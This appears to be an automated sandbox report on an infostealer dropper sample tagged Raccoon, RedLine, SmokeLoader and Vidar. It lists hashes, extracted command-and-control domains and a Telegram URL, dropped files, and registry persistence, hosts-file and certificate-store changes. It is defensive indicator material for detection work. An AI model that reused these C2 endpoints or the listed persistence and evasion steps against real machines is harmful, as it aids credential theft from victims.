raccoon | 65fa93616cdb8c92a541dd2ad8468d6688e1b1f2606891b56db3e90fbfc9acbd

Target

Install.exe
Size

497KB
MD5

41a5f4fd1ea7cac4aa94a87aebccfef0
SHA1

0d0abf079413a4c773754bf4fda338dc5b9a8ddc
SHA256

97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9
SHA512

5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

Score

10^/10

raccoon redline smokeloader vidar 04.05.222rr 9afb493c6f82d08075dbbfa7d93ce97f1dbf4733 backdoor discovery evasion infostealer persistence stealer trojan upx

Malware Config

Extracted

Family

redline

Botnet

04.05.222RR

redworksite.info:80

Extracted

Family

raccoon

Botnet

9afb493c6f82d08075dbbfa7d93ce97f1dbf4733

Attributes

url4cnc
https://tttttt.me/antitantief3

rc4.plain

Extracted

Family

smokeloader

Version

2020

http://999080321newfolder1002002131-service1002.space/

http://999080321newfolder1002002231-service1002.space/

http://999080321newfolder3100231-service1002.space/

http://999080321newfolder1002002431-service1002.space/

http://999080321newfolder1002002531-service1002.space/

http://999080321newfolder33417-012425999080321.space/

http://999080321test125831-service10020125999080321.space/

http://999080321test136831-service10020125999080321.space/

http://999080321test147831-service10020125999080321.space/

http://999080321test146831-service10020125999080321.space/

http://999080321test134831-service10020125999080321.space/

http://999080321est213531-service1002012425999080321.ru/

http://999080321yes1t3481-service10020125999080321.ru/

http://999080321test13561-service10020125999080321.su/

http://999080321test14781-service10020125999080321.info/

http://999080321test13461-service10020125999080321.net/

http://999080321test15671-service10020125999080321.tech/

http://999080321test12671-service10020125999080321.online/

http://999080321utest1341-service10020125999080321.ru/

http://999080321uest71-service100201dom25999080321.ru/

rc4.i32

Signatures

Raccoon
Simple but powerful infostealer which was very active in 2019.
stealer raccoon
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 5 IoCs

Processes:

resource	yara_rule
behavioral29/memory/5636-225-0x0000000000400000-0x000000000041C000-memory.dmp	family_redline
behavioral29/memory/5636-226-0x00000000004163C6-mapping.dmp	family_redline
C:\Users\Admin\AppData\Local\Temp\654075992.exe	family_redline
C:\Users\Admin\AppData\Local\Temp\654075992.exe	family_redline
behavioral29/memory/1244-342-0x00000000004163C6-mapping.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
evasion

Software Discovery
T1518
Downloads MZ/PE file
Drops file in Drivers directory 1 IoCs

Processes:

Ultra.exe

description ioc process

File opened for modification C:\Windows\system32\drivers\etc\hosts Ultra.exe

description	ioc	process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	Ultra.exe

Executes dropped EXE 11 IoCs

Processes:

Install.tmpUltra.exeultramediaburner.exeultramediaburner.tmpFyvicufaecae.exeUltraMediaBurner.exeFazhasecusae.exesskiper.exeKiffMainE1.exe001.exe828001925.exe

pid	process
1040	Install.tmp
4052	Ultra.exe
3736	ultramediaburner.exe
3420	ultramediaburner.tmp
2972	Fyvicufaecae.exe
2132	UltraMediaBurner.exe
2308	Fazhasecusae.exe
4808	sskiper.exe
5076	KiffMainE1.exe
4484	001.exe
4524	828001925.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Fyvicufaecae.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation	Fyvicufaecae.exe

Loads dropped DLL 1 IoCs

Processes:

Install.tmp

pid process

1040 Install.tmp

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

Ultra.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Mail\\Gashygetamae.exe\""	Ultra.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 14 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow	ioc
415	api.ipify.org
531	ipinfo.io
533	ipinfo.io
225	ipinfo.io
233	api.myip.com
301	ip-api.com
223	ipinfo.io
287	ipinfo.io
309	ipinfo.io
459	ip-api.com
234	api.myip.com
308	ipinfo.io
543	ipinfo.io
101	ip-api.com

Drops file in Program Files directory 9 IoCs

Processes:

Ultra.exeultramediaburner.tmp

description	ioc	process
File created	C:\Program Files\Windows Photo Viewer\ONMFVFPQDZ\ultramediaburner.exe	Ultra.exe
File created	C:\Program Files\Windows Photo Viewer\ONMFVFPQDZ\ultramediaburner.exe.config	Ultra.exe
File created	C:\Program Files (x86)\UltraMediaBurner\unins000.dat	ultramediaburner.tmp
File created	C:\Program Files (x86)\UltraMediaBurner\is-MM4CL.tmp	ultramediaburner.tmp
File created	C:\Program Files (x86)\Windows Mail\Gashygetamae.exe.config	Ultra.exe
File opened for modification	C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe	ultramediaburner.tmp
File created	C:\Program Files (x86)\UltraMediaBurner\is-RSDHL.tmp	ultramediaburner.tmp
File opened for modification	C:\Program Files (x86)\UltraMediaBurner\unins000.dat	ultramediaburner.tmp
File created	C:\Program Files (x86)\Windows Mail\Gashygetamae.exe	Ultra.exe

Drops file in Windows directory 1 IoCs

Processes:

MicrosoftEdge.exe

description ioc process

File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

description	ioc	process
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe

Program crash 23 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
8468	5788	WerFault.exe	85288869173.exe
8712	896	WerFault.exe	11102915604.exe
8812	7224	WerFault.exe	72923920932.exe
8804	5788	WerFault.exe	85288869173.exe
9112	896	WerFault.exe	11102915604.exe
7320	5788	WerFault.exe	85288869173.exe
6180	7224	WerFault.exe	72923920932.exe
2500	896	WerFault.exe	11102915604.exe
9160	7224	WerFault.exe	72923920932.exe
9416	896	WerFault.exe	11102915604.exe
9444	7224	WerFault.exe	72923920932.exe
9672	896	WerFault.exe	11102915604.exe
9900	7224	WerFault.exe	72923920932.exe
9972	896	WerFault.exe	11102915604.exe
10180	7224	WerFault.exe	72923920932.exe
4132	7224	WerFault.exe	72923920932.exe
7752	5692	WerFault.exe	6E92.exe
4032	5692	WerFault.exe	6E92.exe
4868	5692	WerFault.exe	6E92.exe
8688	5692	WerFault.exe	6E92.exe
2356	5692	WerFault.exe	6E92.exe
9784	5788	WerFault.exe	85288869173.exe
8408	5788	WerFault.exe	85288869173.exe

Delays execution with timeout.exe 3 IoCs
evasion

Processes:

timeout.exetimeout.exetimeout.exe

pid process

5800 timeout.exe
9756 timeout.exe
7972 timeout.exe
Download via BitsAdmin 1 TTPs 1 IoCs
dropper

BITS Jobs
T1197

Processes:

bitsadmin.exe

pid process

8876 bitsadmin.exe

pid	process
5800	timeout.exe
9756	timeout.exe
7972	timeout.exe

pid	process
8876	bitsadmin.exe

Kills process with taskkill 9 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
5580	taskkill.exe
2224	taskkill.exe
8016	taskkill.exe
800	taskkill.exe
8264	taskkill.exe
7420	taskkill.exe
5136	taskkill.exe
5432	taskkill.exe
2920	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 3 IoCs

adware spyware

Modify Registry

T1112

Processes:

MicrosoftEdge.exebrowser_broker.exeMicrosoftEdgeCP.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdgeCP.exe

Modifies registry class 64 IoCs

Processes:

MicrosoftEdge.exeMicrosoftEdgeCP.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Extensible Cache	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode\FontSize = "3"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionLow = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CacheLimit = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\TypedUrlsComplete = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionLow = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = ee16bf0bfc40d701	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\MigrationTime = 301bd569d72dd701	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CacheLimit = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CachePrefix = "Visited:"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\FirstRecoveryTime = 301bd569d72dd701	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url3 = "https://signin.ebay.com/ws/ebayisapi.dll"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\MigrationTime = 301bd569d72dd701	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\DetectPhoneNumberCompletedV = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListDOSTime = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main\OperationalData = "1"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. = 0100000065d2a7db95fb407883fdf2ccae865418bd42f9be9afa1ec1fa0e22e79c1dac83360db486eaea3aa81c4eba6a7330437a126605962430062b948dba20f7413d9d02c12464426ffe2216e1ad0ef8166b68a4d2a605198b36ea7a9dbb90a0b21ec45f8eee1329a894043e554d74465aca7af1279ed6f02ac6e6f3dd0bb4ea90d7d90514d6f2b4b60041a74a555cce1ab9fe59067407b82f2576f2efab9495fb4aa4ecf207f2b2b95c1fb4605b7160783b54f20d43adc5b9c7bd7072dd9bbe134f61e2caccfc69d2a107c037392cb892ea1e68de5c5f0ee81b67c605dd7433f985158c3b0df0ce1fb29e5d70bf33238a9047d0174c3910dc8ca5934a34fe0acb1cb9a5e5da1fd4c1013247a9efbd9a7e2fcc8959e665e2b4188914e0674f65aa432fa368896d75d9be7708839d9d15902d600c450f3fd39233a5826687c679b62b0f4a6479f159856095e49e0b209fdecddcaa7974fe3c95e003f97e1031510f913c7b798b2ae3e64380f29a07f5fd8abc8154977ef755ddea6841c7c9f858d59850364734ce811ca0a98417582973b37d069b3d6769f68918e99ca6250f586609965b1fa5330f2c	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{AEBA21FA-782A-4A90-978D-B72164C = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Zoom	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IETld\LowMic	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-SubSysId = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify.	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\SyncIEFirstTimeFullScan = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\DatabaseComplete = "1"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url5 = "https://twitter.com/"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry\DOMStorage	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionHigh = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CacheLimit = "1"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\Extensions	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 155a400cfc40d701	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\EnableNegotiate = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CacheLimit = "256000"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\PrivacyAdvanced = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-Revision = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration	MicrosoftEdge.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

Fyvicufaecae.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	Fyvicufaecae.exe
